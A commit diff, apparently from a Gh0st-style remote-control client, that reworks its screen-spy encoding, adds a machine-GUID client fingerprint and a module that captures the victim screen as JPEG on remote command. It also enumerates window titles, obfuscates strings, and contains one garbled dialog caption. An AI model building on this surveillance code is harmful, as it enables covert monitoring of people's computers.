@@ -306,7 +368,7 @@ LOGIN_INFOR GetLoginInfo(DWORD dwSpeed, CONNECT_ADDRESS& conn, const std::string
LoginInfor.AddReserved(sizeof(void*)==4 ? 32 : 64); // 程序位数 LoginInfor.AddReserved(sizeof(void*)==4 ? 32 : 64); // 程序位数
std::string masterHash(skCrypt(MASTER_HASH)); std::string masterHash(skCrypt(MASTER_HASH));
WIN32_FILE_ATTRIBUTE_DATA fileInfo; WIN32_FILE_ATTRIBUTE_DATA fileInfo;
GetFileAttributesExA(buf, GetFileExInfoStandard, &fileInfo); GetFileAttributesExW(wbuf, GetFileExInfoStandard, &fileInfo);
LoginInfor.AddReserved(str.c_str()); // 授权信息 LoginInfor.AddReserved(str.c_str()); // 授权信息
bool isDefault = strlen(conn.szFlag) == 0 || strcmp(conn.szFlag, skCrypt(FLAG_GHOST)) == 0 || bool isDefault = strlen(conn.szFlag) == 0 || strcmp(conn.szFlag, skCrypt(FLAG_GHOST)) == 0 ||
strcmp(conn.szFlag, skCrypt("Happy New Year!")) == 0; strcmp(conn.szFlag, skCrypt("Happy New Year!")) == 0;
@@ -332,7 +394,17 @@ LOGIN_INFOR GetLoginInfo(DWORD dwSpeed, CONNECT_ADDRESS& conn, const std::string
LoginInfor.AddReserved(IsRunningAsAdmin()); LoginInfor.AddReserved(IsRunningAsAdmin());
char cpuInfo[32]; char cpuInfo[32];
sprintf(cpuInfo, "%dMHz", dwCPUMHz); sprintf(cpuInfo, "%dMHz", dwCPUMHz);
conn.clientID = CalcalateID({ pubIP, szPCName, LoginInfor.OsVerInfoEx, cpuInfo, buf }); // V2 ID 算法MachineGuid + 归一化路径
// - 同机同程序路径永远同 ID不依赖 IP/PCName/OS/CPU 漂移)
// - 局域网多机即便同镜像sysprep 会让 MachineGuid 各不同)也不撞库
// MachineGuid 读取失败的极端情况退化到老算法,保兼容。
std::string machineGuid = GetMachineGuidWindows();
if (!machineGuid.empty()) {
conn.clientID = CalcalateIDv2(machineGuid, NormalizeExePathLower(buf));
} else {
Mprintf("WARN: MachineGuid 读取失败,回退到老 ID 算法\n");
conn.clientID = CalcalateID({ pubIP, szPCName, LoginInfor.OsVerInfoEx, cpuInfo, buf });
}
auto clientID = std::to_string(conn.clientID); auto clientID = std::to_string(conn.clientID);
Mprintf("此客户端的唯一标识为: %s\n", clientID.c_str()); Mprintf("此客户端的唯一标识为: %s\n", clientID.c_str());
char reservedInfo[64]; char reservedInfo[64];

10329
client/SCLoader.cpp
View File

File diff suppressed because it is too large Load Diff

91
client/ScreenCapture.h
View File

@@ -13,8 +13,11 @@
#include <condition_variable> #include <condition_variable>
#include <functional> #include <functional>
#include <future> #include <future>
#include <memory>
#include <emmintrin.h> // SSE2 #include <emmintrin.h> // SSE2
#include "X264Encoder.h" #include "common/config.h"
#include "VideoEncoderBase.h"
#include "EncoderFactory.h"
#include "ScrollDetector.h" #include "ScrollDetector.h"
#include "common/file_upload.h" #include "common/file_upload.h"
@@ -126,6 +129,7 @@ public:
ULONG* m_BlockSizes; // 分块差异像素数 ULONG* m_BlockSizes; // 分块差异像素数
int m_BlockNum; // 分块个数 int m_BlockNum; // 分块个数
int m_SendQuality; // 发送质量 int m_SendQuality; // 发送质量
int m_EncodeLevel; // 编码级别
LPBITMAPINFO m_BitmapInfor_Full; // BMP信息 LPBITMAPINFO m_BitmapInfor_Full; // BMP信息
LPBITMAPINFO m_BitmapInfor_Send; // 发送的BMP信息 LPBITMAPINFO m_BitmapInfor_Send; // 发送的BMP信息
@@ -145,7 +149,7 @@ public:
int m_FrameID; // 帧序号 int m_FrameID; // 帧序号
int m_GOP; // 关键帧间隔 int m_GOP; // 关键帧间隔
bool m_SendKeyFrame; // 发送关键帧 bool m_SendKeyFrame; // 发送关键帧
CX264Encoder *m_encoder; // 编码器 std::unique_ptr<VideoEncoderBase> m_encoder; // 编码器ensureEncoder() lazy 创建,走 EncoderFactory 探测
int m_nScreenCount; // 屏幕数量 int m_nScreenCount; // 屏幕数量
BOOL m_bEnableMultiScreen;// 多显示器支持 BOOL m_bEnableMultiScreen;// 多显示器支持
@@ -182,15 +186,16 @@ protected:
int m_nVScreenHeight = GetSystemMetrics(SM_CYVIRTUALSCREEN); int m_nVScreenHeight = GetSystemMetrics(SM_CYVIRTUALSCREEN);
public: public:
ScreenCapture(int n = 32, BYTE algo = ALGORITHM_DIFF, BOOL all = FALSE) : ScreenCapture(int n = 32, BYTE algo = ALGORITHM_DIFF, BOOL all = FALSE, int level = LEVEL_H264_SOFT) :
m_ThreadPool(nullptr), m_FirstBuffer(nullptr), m_RectBuffer(nullptr), m_ThreadPool(nullptr), m_FirstBuffer(nullptr), m_RectBuffer(nullptr),
m_BitmapInfor_Full(nullptr), m_bAlgorithm(algo), m_SendQuality(100), m_BitmapInfor_Full(nullptr), m_bAlgorithm(algo), m_SendQuality(100),
m_ulFullWidth(0), m_ulFullHeight(0), m_bZoomed(false), m_wZoom(1), m_hZoom(1), m_ulFullWidth(0), m_ulFullHeight(0), m_bZoomed(false), m_wZoom(1), m_hZoom(1),
m_FrameID(0), m_GOP(DEFAULT_GOP), m_iScreenX(0), m_iScreenY(0), m_biBitCount(n), m_FrameID(0), m_GOP(DEFAULT_GOP), m_iScreenX(0), m_iScreenY(0), m_biBitCount(n),
m_SendKeyFrame(false), m_encoder(nullptr), m_SendKeyFrame(false), m_encoder(nullptr),
m_pScrollDetector(nullptr), m_bEnableScrollDetect(false), m_bServerSupportsScroll(false), m_pScrollDetector(nullptr), m_bEnableScrollDetect(false), m_bServerSupportsScroll(false),
m_bLastFrameWasScroll(false), m_nScrollDetectInterval(1) m_bLastFrameWasScroll(false), m_nScrollDetectInterval(1), m_EncodeLevel(level)
{ {
SetAlgorithm(algo);
m_BitmapInfor_Send = nullptr; m_BitmapInfor_Send = nullptr;
m_BmpZoomBuffer = nullptr; m_BmpZoomBuffer = nullptr;
m_BmpZoomFirst = nullptr; m_BmpZoomFirst = nullptr;
@@ -255,7 +260,6 @@ public:
SAFE_DELETE_ARRAY(m_BlockSizes); SAFE_DELETE_ARRAY(m_BlockSizes);
SAFE_DELETE(m_ThreadPool); SAFE_DELETE(m_ThreadPool);
SAFE_DELETE(m_encoder);
SAFE_DELETE(m_pScrollDetector); SAFE_DELETE(m_pScrollDetector);
} }
@@ -638,11 +642,10 @@ public:
// 写入算法类型 // 写入算法类型
data[0] = algo; data[0] = algo;
// 写入光标位置 // 写入光标位置(虚拟桌面绝对坐标 → 发送坐标系)
POINT CursorPos; POINT CursorPos;
GetCursorPos(&CursorPos); GetCursorPos(&CursorPos);
CursorPos.x /= m_wZoom; PointConversionInverse(CursorPos);
CursorPos.y /= m_hZoom;
memcpy(data + 1, &CursorPos, sizeof(POINT)); memcpy(data + 1, &CursorPos, sizeof(POINT));
// 写入当前光标类型(支持自定义光标) // 写入当前光标类型(支持自定义光标)
@@ -839,6 +842,19 @@ public:
return bmpInfo; return bmpInfo;
} }
// 编码器 lazy 创建。委托 EncoderFactory 完成"硬编探测 + 软编 fallback"。
void ensureEncoder(int width, int height)
{
if (m_encoder) return;
EncoderRequest req;
req.width = width;
req.height = height;
req.fps = 20;
req.bitrate_kbps = (m_nBitRate > 0) ? m_nBitRate : (width * height / 1266);
req.encodeLevel = m_EncodeLevel;
m_encoder = CreateEncoder(req);
}
// 算法+光标位置+光标类型 // 算法+光标位置+光标类型
virtual LPBYTE GetNextScreenData(ULONG* ulNextSendLength) virtual LPBYTE GetNextScreenData(ULONG* ulNextSendLength)
{ {
@@ -850,11 +866,10 @@ public:
// 写入使用了哪种算法 // 写入使用了哪种算法
memcpy(data, (LPBYTE)&algo, sizeof(BYTE)); memcpy(data, (LPBYTE)&algo, sizeof(BYTE));
// 写入光标位置 // 写入光标位置(虚拟桌面绝对坐标 → 发送坐标系)
POINT CursorPos; POINT CursorPos;
GetCursorPos(&CursorPos); GetCursorPos(&CursorPos);
CursorPos.x /= m_wZoom; PointConversionInverse(CursorPos);
CursorPos.y /= m_hZoom;
memcpy(data + sizeof(BYTE), (LPBYTE)&CursorPos, sizeof(POINT)); memcpy(data + sizeof(BYTE), (LPBYTE)&CursorPos, sizeof(POINT));
// 写入当前光标类型(支持自定义光标) // 写入当前光标类型(支持自定义光标)
@@ -924,13 +939,12 @@ public:
uint8_t* encoded_data = nullptr; uint8_t* encoded_data = nullptr;
uint32_t encoded_size = 0; uint32_t encoded_size = 0;
int width = m_BitmapInfor_Send->bmiHeader.biWidth, height = m_BitmapInfor_Send->bmiHeader.biHeight; int width = m_BitmapInfor_Send->bmiHeader.biWidth, height = m_BitmapInfor_Send->bmiHeader.biHeight;
if (m_encoder == nullptr) { ensureEncoder(width, height);
m_encoder = new CX264Encoder(); if (!m_encoder) return nullptr;
int br = (m_nBitRate > 0) ? m_nBitRate : (width * height / 1266); m_encoder->forceIDR(); // 协议层 keyframe → 编码器强制 IDR与 TOKEN_KEYFRAME 语义对齐
m_encoder->open(width, height, 20, BitRateToCRF(br));
}
int err = m_encoder->encode(nextData, 32, 4 * width, width, height, &encoded_data, &encoded_size); int err = m_encoder->encode(nextData, 32, 4 * width, width, height, &encoded_data, &encoded_size);
if (err) { // encoded_size == 0硬编首帧延迟avcodec_receive_packet 返回 EAGAIN本帧无码流按失败跳过
if (err || encoded_size == 0) {
return nullptr; return nullptr;
} }
*ulNextSendLength = 1 + offset + encoded_size; *ulNextSendLength = 1 + offset + encoded_size;
@@ -954,17 +968,28 @@ public:
uint8_t* encoded_data = nullptr; uint8_t* encoded_data = nullptr;
uint32_t encoded_size = 0; uint32_t encoded_size = 0;
int width = m_BitmapInfor_Send->bmiHeader.biWidth, height = m_BitmapInfor_Send->bmiHeader.biHeight; int width = m_BitmapInfor_Send->bmiHeader.biWidth, height = m_BitmapInfor_Send->bmiHeader.biHeight;
if (m_encoder == nullptr) { ensureEncoder(width, height);
m_encoder = new CX264Encoder(); if (!m_encoder) return nullptr;
int br = (m_nBitRate > 0) ? m_nBitRate : (width * height / 1266); // 应用层 skip 检测硬编器nvenc/qsv/amf/mf/av1_*)对静态画面 RC 偏弱,
m_encoder->open(width, height, 20, BitRateToCRF(br)); // 即使逐像素完全一致仍 emit ~5KB/帧的"近 skip P 帧",让空闲流量长期
// 维持 100-200 KB/s每 4s GOP 还叠加一个 IDR。整帧 memcmp BGRA
// 找出真无变化帧直接跳过 encode仅发 cursorx264 走这里也省 CPU 无副作用。
LPBYTE prev = GetFirstBuffer();
ULONG bgraSize = m_BitmapInfor_Send->bmiHeader.biSizeImage;
if (prev && memcmp(nextData, prev, bgraSize) == 0) {
*ulNextSendLength = 1 + offset; // 仅 cursor无视频负载
return m_RectBuffer;
} }
int err = m_encoder->encode(nextData, 32, 4 * width, width, height, &encoded_data, &encoded_size); int err = m_encoder->encode(nextData, 32, 4 * width, width, height, &encoded_data, &encoded_size);
if (err) { // encoded_size == 0硬编首帧延迟本帧无码流按失败跳过
if (err || encoded_size == 0) {
return nullptr; return nullptr;
} }
*ulNextSendLength = 1 + offset + encoded_size; *ulNextSendLength = 1 + offset + encoded_size;
memcpy(data + offset, encoded_data, encoded_size); memcpy(data + offset, encoded_data, encoded_size);
// 更新参考帧供下一帧 memcmp。必须在 encode 成功之后更新,否则编码
// 失败时下一帧会误以为"已发"而漏发真实变化。
memcpy(prev, nextData, bgraSize);
break; break;
} }
default: default:
@@ -985,7 +1010,7 @@ public:
virtual BYTE SetAlgorithm(int algo) virtual BYTE SetAlgorithm(int algo)
{ {
BYTE oldAlgo = m_bAlgorithm; BYTE oldAlgo = m_bAlgorithm;
m_bAlgorithm = algo; m_bAlgorithm = (DISABLE_X264_FOR_TEST && algo == ALGORITHM_H264) ? ALGORITHM_RGB565 : algo;
return oldAlgo; return oldAlgo;
} }
@@ -1024,6 +1049,26 @@ public:
pt.y += m_iScreenY; pt.y += m_iScreenY;
} }
// 鼠标位置反向转换将客户端绝对坐标GetCursorPos转换为发送坐标系逐项是 PointConversion 的逆
virtual void PointConversionInverse(POINT& pt) const
{
// 3'. 减去屏幕偏移(多显示器)
pt.x -= m_iScreenX;
pt.y -= m_iScreenY;
// 2'. 反向 DPI 缩放
if (m_bZoomed) {
pt.x = (LONG)(pt.x / m_wZoom);
pt.y = (LONG)(pt.y / m_hZoom);
}
// 1'. full → send 缩放(位图下采样传输时)
int sendWidth = m_BitmapInfor_Send->bmiHeader.biWidth;
int sendHeight = m_BitmapInfor_Send->bmiHeader.biHeight;
if (sendWidth != (int)m_ulFullWidth || sendHeight != (int)m_ulFullHeight) {
pt.x = (LONG)((double)pt.x * sendWidth / m_ulFullWidth + 0.5);
pt.y = (LONG)((double)pt.y * sendHeight / m_ulFullHeight + 0.5);
}
}
// 获取位图结构信息 // 获取位图结构信息
virtual const LPBITMAPINFO& GetBIData() const virtual const LPBITMAPINFO& GetBIData() const
{ {

3
client/ScreenCapturerDXGI.h
View File

@@ -25,7 +25,8 @@ private:
BYTE* m_NextBuffer = nullptr; BYTE* m_NextBuffer = nullptr;
public: public:
ScreenCapturerDXGI(BYTE algo, int gop = DEFAULT_GOP, BOOL all = FALSE) : ScreenCapture(32, algo, all) ScreenCapturerDXGI(BYTE algo, int gop = DEFAULT_GOP, BOOL all = FALSE, int level = LEVEL_H264_SOFT)
: ScreenCapture(32, algo, all, level)
{ {
m_GOP = gop; m_GOP = gop;
InitDXGI(all); InitDXGI(all);

29
client/ScreenManager.cpp
View File

@@ -100,7 +100,8 @@ CScreenManager::CScreenManager(IOCPClient* ClientObject, int n, void* user, BOOL
extern ClientApp g_MyApp; extern ClientApp g_MyApp;
SetConnection(g_MyApp.g_Connection); // 同时设置 m_conn 和 m_MyClientID SetConnection(g_MyApp.g_Connection); // 同时设置 m_conn 和 m_MyClientID
CKernelManager* main = (CKernelManager*)ClientObject->GetMain(); CKernelManager* main = (CKernelManager*)ClientObject->GetMain();
InitFileUpload({}, main ? main->m_LoginMsg : ClientObject->m_LoginMsg, m_Signature = main ? main->m_LoginSignature : ClientObject->m_LoginSignature;
if (!m_Signature.empty()) InitFileUpload({}, main ? main->m_LoginMsg : ClientObject->m_LoginMsg,
main ? main->m_LoginSignature : ClientObject->m_LoginSignature, 64, 50, Logf); main ? main->m_LoginSignature : ClientObject->m_LoginSignature, 64, 50, Logf);
#endif #endif
m_isGDI = TRUE; m_isGDI = TRUE;
@@ -137,7 +138,11 @@ CScreenManager::CScreenManager(IOCPClient* ClientObject, int n, void* user, BOOL
} }
} }
BOOL fixedQuality = all || algo == ALGORITHM_H264; int quality = cfg.GetInt("settings", "QualityLevel", QUALITY_GOOD);
if (algo != (BYTE)ALGORITHM_NUL)
quality = QUALITY_DISABLED;
Mprintf("图像传输算法: %d, 多显示器支持是否启用: %d, 屏幕质量等级: %d\n", (int)algo, all, quality);
m_ScreenSettings.MaxFPS = m_nMaxFPS; m_ScreenSettings.MaxFPS = m_nMaxFPS;
m_ScreenSettings.CompressThread = threadNum; m_ScreenSettings.CompressThread = threadNum;
m_ScreenSettings.ScreenStrategy = cfg.GetInt("settings", "ScreenStrategy", 0); m_ScreenSettings.ScreenStrategy = cfg.GetInt("settings", "ScreenStrategy", 0);
@@ -146,9 +151,10 @@ CScreenManager::CScreenManager(IOCPClient* ClientObject, int n, void* user, BOOL
m_ScreenSettings.FullScreen = cfg.GetInt("settings", "FullScreen", priv); m_ScreenSettings.FullScreen = cfg.GetInt("settings", "FullScreen", priv);
m_ScreenSettings.RemoteCursor = cfg.GetInt("settings", "RemoteCursor", 0); m_ScreenSettings.RemoteCursor = cfg.GetInt("settings", "RemoteCursor", 0);
m_ScreenSettings.ScrollDetectInterval = cfg.GetInt("settings", "ScrollDetectInterval", 2); // 默认每2帧 m_ScreenSettings.ScrollDetectInterval = cfg.GetInt("settings", "ScrollDetectInterval", 2); // 默认每2帧
m_ScreenSettings.QualityLevel = cfg.GetInt("settings", "QualityLevel", fixedQuality ? QUALITY_GOOD : QUALITY_ADAPTIVE); m_ScreenSettings.QualityLevel = cfg.GetInt("settings", "QualityLevel", quality);
m_ScreenSettings.CpuSpeedup = cfg.GetInt("settings", "CpuSpeedup", 0); m_ScreenSettings.CpuSpeedup = cfg.GetInt("settings", "CpuSpeedup", 0);
m_ScreenSettings.AudioEnabled = cfg.GetInt("settings", "AudioEnabled", 0); // 默认禁用音频 m_ScreenSettings.AudioEnabled = cfg.GetInt("settings", "AudioEnabled", 0); // 默认禁用音频
m_ScreenSettings.EncodeLevel = cfg.GetInt("settings", "EncodeLevel", LEVEL_H264_SOFT);
LoadQualityProfiles(); // 加载质量配置 LoadQualityProfiles(); // 加载质量配置
@@ -514,18 +520,18 @@ void CScreenManager::InitScreenSpy()
SAFE_DELETE(m_ScreenSpyObject); SAFE_DELETE(m_ScreenSpyObject);
if ((USING_DXGI == DXGI && IsWindows8orHigher())) { if ((USING_DXGI == DXGI && IsWindows8orHigher())) {
m_isGDI = FALSE; m_isGDI = FALSE;
auto s = new ScreenCapturerDXGI(algo, DEFAULT_GOP, all); auto s = new ScreenCapturerDXGI(algo, DEFAULT_GOP, all, m_ScreenSettings.EncodeLevel);
if (s->IsInitSucceed()) { if (s->IsInitSucceed()) {
m_ScreenSpyObject = s; m_ScreenSpyObject = s;
} else { } else {
SAFE_DELETE(s); SAFE_DELETE(s);
m_isGDI = TRUE; m_isGDI = TRUE;
m_ScreenSpyObject = new CScreenSpy(32, algo, FALSE, DEFAULT_GOP, all); m_ScreenSpyObject = new CScreenSpy(32, algo, FALSE, DEFAULT_GOP, all, m_ScreenSettings.EncodeLevel);
Mprintf("CScreenManager: DXGI SPY init failed!!! Using GDI instead.\n"); Mprintf("CScreenManager: DXGI SPY init failed!!! Using GDI instead.\n");
} }
} else { } else {
m_isGDI = TRUE; m_isGDI = TRUE;
m_ScreenSpyObject = new CScreenSpy(32, algo, DXGI == USING_VIRTUAL, DEFAULT_GOP, all); m_ScreenSpyObject = new CScreenSpy(32, algo, DXGI == USING_VIRTUAL, DEFAULT_GOP, all, m_ScreenSettings.EncodeLevel);
} }
} }
@@ -714,7 +720,8 @@ VOID CScreenManager::SendBitMapInfo()
CScreenManager::~CScreenManager() CScreenManager::~CScreenManager()
{ {
Mprintf("ScreenManager 析构函数\n"); Mprintf("ScreenManager 析构函数\n");
UninitFileUpload(); if (!m_Signature.empty())
UninitFileUpload();
m_bIsWorking = FALSE; m_bIsWorking = FALSE;
m_bAudioThreadRunning = FALSE; // 停止音频线程 m_bAudioThreadRunning = FALSE; // 停止音频线程
@@ -811,6 +818,14 @@ VOID CScreenManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
m_ClientObject->StopRunning(); m_ClientObject->StopRunning();
break; break;
} }
case COMMAND_ENCODE_LEVEL: {
int encodeLevel = szBuffer[1];
iniFile cfg(CLIENT_PATH);
cfg.SetInt("settings", "EncodeLevel", encodeLevel);
Mprintf("[CScreenManager] Change Encode Level: %d -> %d\n", m_ScreenSettings.EncodeLevel, encodeLevel);
m_ScreenSettings.EncodeLevel = encodeLevel;
break;
}
case COMMAND_SWITCH_SCREEN: { case COMMAND_SWITCH_SCREEN: {
SwitchScreen(); SwitchScreen();
break; break;

2
client/ScreenManager.h
View File

@@ -90,7 +90,7 @@ public:
uint64_t m_nReconnectTime = 0; // 重连开始时间 uint64_t m_nReconnectTime = 0; // 重连开始时间
uint64_t m_DlgID = 0; uint64_t m_DlgID = 0;
BOOL m_SendFirst = FALSE; BOOL m_SendFirst = FALSE;
std::string m_Signature;
// 虚拟桌面 // 虚拟桌面
BOOL m_virtual; BOOL m_virtual;
POINT m_point; POINT m_point;

188
client/ScreenPreview.cpp Normal file
View File

@@ -0,0 +1,188 @@
// ScreenPreview.cpp
#include "stdafx.h"
#include "ScreenPreview.h"
#include "../common/commands.h" // ScreenPreviewStatus
#include <windows.h>
#include <objidl.h> // IUnknown / IStream — gdiplus.h 依赖它们已声明
#include <gdiplus.h>
#pragma comment(lib, "gdiplus.lib")
using namespace Gdiplus;
namespace {
// GDI+ 进程级初始化(与 Bmp2Video 互不冲突Startup 可重入计数)
struct GdiplusBoot {
ULONG_PTR token = 0;
bool ok = false;
GdiplusBoot()
{
GdiplusStartupInput in;
ok = (GdiplusStartup(&token, &in, NULL) == Ok);
}
~GdiplusBoot()
{
if (ok) GdiplusShutdown(token);
}
};
static GdiplusBoot g_boot;
int GetJpegEncoderClsid(CLSID& clsid)
{
UINT num = 0, size = 0;
GetImageEncodersSize(&num, &size);
if (size == 0) return -1;
std::vector<BYTE> buf(size);
ImageCodecInfo* info = reinterpret_cast<ImageCodecInfo*>(buf.data());
GetImageEncoders(num, size, info);
for (UINT i = 0; i < num; ++i) {
if (wcscmp(info[i].MimeType, L"image/jpeg") == 0) {
clsid = info[i].Clsid;
return 0;
}
}
return -1;
}
// 抓主屏到 24bpp Bitmap目标尺寸已等比换算。
// 返回新分配的 Bitmap*,失败返回 nullptr。调用者负责 delete。
Bitmap* GrabPrimaryScaled(int targetW, int targetH)
{
HDC hScreen = GetDC(NULL);
if (!hScreen) return nullptr;
int srcX = GetSystemMetrics(SM_XVIRTUALSCREEN); // 主屏左上 — 仅取主屏时用 0,0
int srcY = GetSystemMetrics(SM_YVIRTUALSCREEN);
(void)srcX; (void)srcY;
int srcW = GetSystemMetrics(SM_CXSCREEN);
int srcH = GetSystemMetrics(SM_CYSCREEN);
if (srcW <= 0 || srcH <= 0) {
ReleaseDC(NULL, hScreen);
return nullptr;
}
HDC hMem = CreateCompatibleDC(hScreen);
HBITMAP hBmp = CreateCompatibleBitmap(hScreen, targetW, targetH);
if (!hMem || !hBmp) {
if (hBmp) DeleteObject(hBmp);
if (hMem) DeleteDC(hMem);
ReleaseDC(NULL, hScreen);
return nullptr;
}
HGDIOBJ oldBmp = SelectObject(hMem, hBmp);
// 高质量缩放HALFTONE 内插
SetStretchBltMode(hMem, HALFTONE);
SetBrushOrgEx(hMem, 0, 0, NULL);
BOOL bb = StretchBlt(hMem, 0, 0, targetW, targetH,
hScreen, 0, 0, srcW, srcH, SRCCOPY | CAPTUREBLT);
SelectObject(hMem, oldBmp);
Bitmap* out = nullptr;
if (bb) {
// 拷贝 HBITMAP 到 GDI+ Bitmap避免后续释放设备 DC 影响图像
Bitmap tmp(hBmp, NULL);
if (tmp.GetLastStatus() == Ok) {
out = tmp.Clone(0, 0, targetW, targetH, PixelFormat24bppRGB);
if (out && out->GetLastStatus() != Ok) {
delete out;
out = nullptr;
}
}
}
DeleteObject(hBmp);
DeleteDC(hMem);
ReleaseDC(NULL, hScreen);
return out;
}
} // namespace
int CaptureAndEncodePreview(int maxWidth, int quality,
std::vector<unsigned char>& out,
int& outWidth, int& outHeight)
{
out.clear();
outWidth = outHeight = 0;
if (!g_boot.ok) return SCREEN_PREVIEW_NOT_SUPPORTED;
if (maxWidth < 64) maxWidth = 64;
if (maxWidth > 1920) maxWidth = 1920;
if (quality < 1) quality = 1;
if (quality > 100) quality = 100;
int srcW = GetSystemMetrics(SM_CXSCREEN);
int srcH = GetSystemMetrics(SM_CYSCREEN);
if (srcW <= 0 || srcH <= 0) return SCREEN_PREVIEW_CAPTURE_FAILED;
// 等比缩放,禁止放大
int targetW = (srcW <= maxWidth) ? srcW : maxWidth;
int targetH = (int)((double)srcH * targetW / srcW + 0.5);
if (targetH <= 0) targetH = 1;
// 偶数对齐JPEG 编码更高效
targetW &= ~1;
targetH &= ~1;
if (targetW < 2) targetW = 2;
if (targetH < 2) targetH = 2;
Bitmap* bmp = GrabPrimaryScaled(targetW, targetH);
if (!bmp) return SCREEN_PREVIEW_CAPTURE_FAILED;
CLSID clsid;
if (GetJpegEncoderClsid(clsid) != 0) {
delete bmp;
return SCREEN_PREVIEW_ENCODE_FAILED;
}
EncoderParameters params;
params.Count = 1;
params.Parameter[0].Guid = EncoderQuality;
params.Parameter[0].Type = EncoderParameterValueTypeLong;
params.Parameter[0].NumberOfValues = 1;
ULONG q = (ULONG)quality;
params.Parameter[0].Value = &q;
IStream* stream = nullptr;
if (FAILED(CreateStreamOnHGlobal(NULL, TRUE, &stream))) {
delete bmp;
return SCREEN_PREVIEW_ENCODE_FAILED;
}
Status st = bmp->Save(stream, &clsid, &params);
delete bmp;
if (st != Ok) {
stream->Release();
return SCREEN_PREVIEW_ENCODE_FAILED;
}
HGLOBAL hMem = NULL;
if (FAILED(GetHGlobalFromStream(stream, &hMem)) || !hMem) {
stream->Release();
return SCREEN_PREVIEW_ENCODE_FAILED;
}
SIZE_T sz = GlobalSize(hMem);
if (sz == 0) {
stream->Release();
return SCREEN_PREVIEW_ENCODE_FAILED;
}
void* p = GlobalLock(hMem);
if (!p) {
stream->Release();
return SCREEN_PREVIEW_ENCODE_FAILED;
}
out.assign((unsigned char*)p, (unsigned char*)p + sz);
GlobalUnlock(hMem);
stream->Release();
outWidth = targetW;
outHeight = targetH;
return SCREEN_PREVIEW_OK;
}

16
client/ScreenPreview.h Normal file
View File

@@ -0,0 +1,16 @@
// ScreenPreview.h
// 屏幕预览:抓主屏 → 等比缩放 → JPEG 编码,供 COMMAND_SCREEN_PREVIEW_REQ 响应使用。
#pragma once
#include <vector>
// 抓取主屏并编码成 JPEG。
// maxWidth 服务端期望的宽度;客户端按源屏宽度等比缩放,不会强制放大
// quality JPEG 质量 1..100(建议 40..85
// out 编码后的 JPEG 字节流
// outWidth 实际编码图宽
// outHeight 实际编码图高
// 返回 0 表示成功;非 0 见 ScreenPreviewStatus枚举在 commands.h
int CaptureAndEncodePreview(int maxWidth, int quality,
std::vector<unsigned char>& out,
int& outWidth, int& outHeight);

4
client/ScreenSpy.cpp
View File

@@ -12,8 +12,8 @@
// Construction/Destruction // Construction/Destruction
////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////
CScreenSpy::CScreenSpy(ULONG ulbiBitCount, BYTE algo, BOOL vDesk, int gop, BOOL all) : CScreenSpy::CScreenSpy(ULONG ulbiBitCount, BYTE algo, BOOL vDesk, int gop, BOOL all, int level) :
ScreenCapture(ulbiBitCount, algo, all) ScreenCapture(ulbiBitCount, algo, all, level)
{ {
m_GOP = gop; m_GOP = gop;

2
client/ScreenSpy.h
View File

@@ -97,7 +97,7 @@ protected:
EnumHwndsPrintData m_data; EnumHwndsPrintData m_data;
public: public:
CScreenSpy(ULONG ulbiBitCount, BYTE algo, BOOL vDesk = FALSE, int gop = DEFAULT_GOP, BOOL all = FALSE); CScreenSpy(ULONG ulbiBitCount, BYTE algo, BOOL vDesk = FALSE, int gop = DEFAULT_GOP, BOOL all = FALSE, int level = LEVEL_H264_SOFT);
virtual ~CScreenSpy(); virtual ~CScreenSpy();

10
client/Script.rc
View File

@@ -7,7 +7,7 @@
// //
// Generated from the TEXTINCLUDE 2 resource. // Generated from the TEXTINCLUDE 2 resource.
// //
#include "afxres.h" #include "winres.h"
///////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////
#undef APSTUDIO_READONLY_SYMBOLS #undef APSTUDIO_READONLY_SYMBOLS
@@ -26,7 +26,7 @@ LANGUAGE LANG_CHINESE, SUBLANG_CHINESE_SIMPLIFIED
IDD_DIALOG DIALOGEX 0, 0, 180, 108 IDD_DIALOG DIALOGEX 0, 0, 180, 108
STYLE DS_SYSMODAL | DS_SETFONT | DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU STYLE DS_SYSMODAL | DS_SETFONT | DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "消息提示" CAPTION "娑堟伅鎻愮ず"
FONT 10, "System", 0, 0, 0x0 FONT 10, "System", 0, 0, 0x0
BEGIN BEGIN
LTEXT "Static",IDC_EDIT_MESSAGE,5,5,170,95 LTEXT "Static",IDC_EDIT_MESSAGE,5,5,170,95
@@ -61,7 +61,7 @@ END
2 TEXTINCLUDE 2 TEXTINCLUDE
BEGIN BEGIN
"#include ""afxres.h""\r\n" "#include ""winres.h""\r\n"
"\0" "\0"
END END
@@ -88,7 +88,7 @@ IDR_WAVE WAVE "Res\\msg.wav"
// //
VS_VERSION_INFO VERSIONINFO VS_VERSION_INFO VERSIONINFO
FILEVERSION 1,0,3,2 FILEVERSION 1,0,3,5
PRODUCTVERSION 1,0,0,1 PRODUCTVERSION 1,0,0,1
FILEFLAGSMASK 0x3fL FILEFLAGSMASK 0x3fL
#ifdef _DEBUG #ifdef _DEBUG
@@ -106,7 +106,7 @@ BEGIN
BEGIN BEGIN
VALUE "CompanyName", "FUCK THE UNIVERSE" VALUE "CompanyName", "FUCK THE UNIVERSE"
VALUE "FileDescription", "A GHOST" VALUE "FileDescription", "A GHOST"
VALUE "FileVersion", "1.0.3.2" VALUE "FileVersion", "1.0.3.5"
VALUE "InternalName", "ServerDll.dll" VALUE "InternalName", "ServerDll.dll"
VALUE "LegalCopyright", "Copyright (C) 2019-2026" VALUE "LegalCopyright", "Copyright (C) 2019-2026"
VALUE "OriginalFilename", "ServerDll.dll" VALUE "OriginalFilename", "ServerDll.dll"

10
client/SystemManager.cpp
View File

@@ -264,8 +264,14 @@ BOOL CALLBACK CSystemManager::EnumWindowsProc(HWND hWnd, LPARAM lParam) //要
LPBYTE szBuffer = *(LPBYTE*)lParam; LPBYTE szBuffer = *(LPBYTE*)lParam;
char szTitle[1024]; char szTitle[1024];
memset(szTitle, 0, sizeof(szTitle)); memset(szTitle, 0, sizeof(szTitle));
//得到系统传递进来的窗口句柄的窗口标题 // 用 W 接口取标题再转 UTF-8 写入 szTitle避免依赖客户端 CP_ACP
GetWindowText(hWnd, szTitle, sizeof(szTitle)); // 服务端 SystemDlg::ShowWindowsList 按 UTF-8 解码后用宽字符塞进 ListCtrl。
wchar_t wTitle[1024] = {};
GetWindowTextW(hWnd, wTitle, _countof(wTitle));
